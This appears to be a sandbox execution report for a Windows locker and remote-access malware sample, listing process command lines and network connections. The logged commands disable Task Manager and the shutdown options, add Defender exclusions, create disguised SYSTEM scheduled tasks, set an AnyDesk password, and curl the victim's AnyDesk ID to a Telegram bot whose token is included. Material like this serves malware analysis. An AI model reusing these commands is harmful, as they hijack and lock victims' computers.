C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=4764 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5208 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=4704 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5772 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4976 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5652 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5624 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=6160 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=6448 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://spankbang.com/tv/?station=hypno+joi
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4972 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=6644 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5844 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5784 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\AppData\Roaming\locked.exe
"C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5860 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-service
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-control
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4088 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4E36.tmp\4E37.tmp\4E38.bat C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=6920 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6968 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=7152 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=2384 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=7584 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=7340 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=5228 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4b8 0x510
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --service
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\757ff3472ee54e2bb9be4f5d45b0175b /t 2404 /p 1824
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --control
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=8056 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\schtasks.exe
schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /run /tn "MicrosoftEdgeUpdateTaskList"
C:\ProgramData\Anydesk.exe
C:\ProgramData/Anydesk.exe
C:\Windows\system32\schtasks.exe
schtasks /run /tn "SystemTaskNavigator"
C:\ProgramData\stn.exe
C:\ProgramData/stn.exe
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9BF3.tmp\9BF4.tmp\9BF5.bat C:\ProgramData\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\timeout.exe
timeout /T 30 /NOBREAK
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=5524 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\ProgramData\Anydesk.exe
"C:\ProgramData\Anydesk.exe" --control
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\ProgramData\Anydesk.exe" --get-id
C:\ProgramData\AnyDesk.exe
C:\ProgramData\Anydesk.exe --get-id
C:\Windows\system32\curl.exe
curl -k -f "https://api.telegram.org/bot7196577299:AAE8GzCCh9rcF27KXAFXed5iYXzI_Yx3DNw/sendMessage?chat_id=-1002158648396&text=Admin-1369714872"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=6280 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
Network
| US | 8.8.8.8:53 | cdn.banhq.com | udp |
| US | 8.8.8.8:53 | cdn.banhq.com | udp |
| US | 8.8.8.8:53 | engine-cm.hqscene.com | udp |
| US | 104.18.40.50:443 | go.xlviirdr.com | udp |
| US | 104.18.40.50:443 | go.xlviirdr.com | udp |
| US | 8.8.8.8:53 | 34.182.117.74.in-addr.arpa | udp |
| FI | 18.165.122.78:443 | cdn.banhq.com | tcp |
| US | 104.18.40.50:443 | go.xlviirdr.com | tcp |
| US | 104.18.40.50:443 | go.xlviirdr.com | tcp |
| US | 8.8.8.8:53 | cdn-cm.hqscene.com | udp |
| US | 8.8.8.8:53 | cdn-cm.hqscene.com | udp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 104.18.48.21:443 | video.ktkjmp.com | udp |
| US | 8.8.8.8:53 | 78.122.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | go.mnaspm.com | udp |
| US | 8.8.8.8:53 | go.mnaspm.com | udp |
| US | 8.8.8.8:53 | go.mnaspm.com | udp |
| US | 8.8.8.8:53 | impactserving.com | udp |
| US | 8.8.8.8:53 | 21.48.18.104.in-addr.arpa | udp |
| US | 104.18.40.50:443 | go.mnaspm.com | udp |
| US | 104.18.40.50:443 | go.mnaspm.com | udp |
| US | 8.8.8.8:53 | xlivesex.com | udp |
| US | 8.8.8.8:53 | xlivesex.com | udp |
| US | 104.18.40.50:443 | go.mnaspm.com | tcp |
| US | 104.17.111.106:443 | xlivesex.com | udp |
| US | 8.8.8.8:53 | creative.mnaspm.com | udp |
| US | 8.8.8.8:53 | creative.mnaspm.com | udp |
| US | 8.8.8.8:53 | creative.mnaspm.com | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 104.17.10.106:443 | img.strpst.com | udp |
| US | 8.8.8.8:53 | s.magsrv.com | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | 106.111.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.10.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.229.211.95.in-addr.arpa | udp |
| US | 104.17.10.106:443 | img.strpst.com | tcp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 104.19.130.98:443 | spankbang.com | udp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| US | 8.8.8.8:53 | img.stripcdn.com | udp |
| US | 8.8.8.8:53 | img.stripcdn.com | udp |
| US | 8.8.8.8:53 | st.stripcdn.com | udp |
| US | 8.8.8.8:53 | st.stripcdn.com | udp |
| US | 8.8.8.8:53 | st.stripcdn.com | udp |
| US | 8.8.8.8:53 | img.stripcdn.com | udp |
| US | 8.8.8.8:53 | st.stripcdn.com | udp |
| US | 8.8.8.8:53 | st.stripcdn.com | udp |
| US | 8.8.8.8:53 | img.stripcdn.com | udp |
| US | 8.8.8.8:53 | img.stripcdn.com | udp |
| US | 8.8.8.8:53 | s3t3d2y8.afcdn.net | udp |
| US | 8.8.8.8:53 | s3t3d2y8.afcdn.net | udp |
| GB | 195.181.164.16:443 | s3t3d2y8.afcdn.net | tcp |
| US | 8.8.8.8:53 | edge-hls.sacdnssedge.com | udp |
| US | 8.8.8.8:53 | edge-hls.sacdnssedge.com | udp |
| GB | 195.181.164.12:443 | edge-hls.sacdnssedge.com | tcp |
| US | 104.18.48.21:443 | video.ktkjmp.com | udp |
| US | 104.18.40.50:443 | creative.mnaspm.com | udp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| US | 104.18.53.225:443 | video.ktkjmp.com | udp |
| US | 3.164.68.34:443 | static.hotjar.com | tcp |
| US | 8.8.8.8:53 | b-hls-14.sacdnssedge.com | udp |
| US | 8.8.8.8:53 | b-hls-14.sacdnssedge.com | udp |
| US | 8.8.8.8:53 | vstream-48.sb-cd.com | udp |
| GB | 195.181.164.12:443 | b-hls-14.sacdnssedge.com | tcp |
| NL | 185.76.10.17:443 | vstream-48.sb-cd.com | tcp |
| US | 8.8.8.8:53 | 16.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.53.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.68.164.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.10.76.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| FI | 108.156.22.67:443 | script.hotjar.com | tcp |
| US | 8.8.8.8:53 | go.xxxviijmp.com | udp |
| US | 8.8.8.8:53 | go.xxxviijmp.com | udp |
| US | 172.64.147.206:443 | go.xxxviijmp.com | udp |
| US | 172.64.147.206:443 | go.xxxviijmp.com | tcp |
| US | 8.8.8.8:53 | 67.22.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.147.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | boot.net.anydesk.com | udp |
| NL | 23.62.61.97:443 | www.bing.com | udp |
| FR | 141.95.145.210:443 | boot.net.anydesk.com | tcp |
| FR | 141.95.145.210:80 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-98c428ee.net.anydesk.com | udp |
| GB | 195.181.165.154:443 | relay-98c428ee.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 8.8.8.8:53 | 210.145.95.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.165.181.195.in-addr.arpa | udp |
| US | 104.17.10.106:443 | img.strpst.com | tcp |
| FR | 141.95.145.210:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-aeafd8c0.net.anydesk.com | udp |
| GB | 57.128.141.154:443 | relay-aeafd8c0.net.anydesk.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 154.141.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.102.255.239.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
